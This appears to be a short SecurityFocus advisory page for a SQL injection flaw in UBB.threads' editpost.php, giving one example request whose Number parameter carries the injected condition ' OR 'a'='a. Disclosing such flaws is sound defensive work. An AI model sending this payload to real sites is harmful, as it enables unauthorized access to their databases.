info
discussion
exploit
solution
references
UBBCentral UBB.threads Editpost.PHP SQL Injection Vulnerability
An exploit is not required.
The following example is available:
http://www.example.com/[path]/editpost.php?Cat=X&Board=X&Number=1'%20OR%20'a'='a
Privacy Statement
Copyright 2010, SecurityFocus
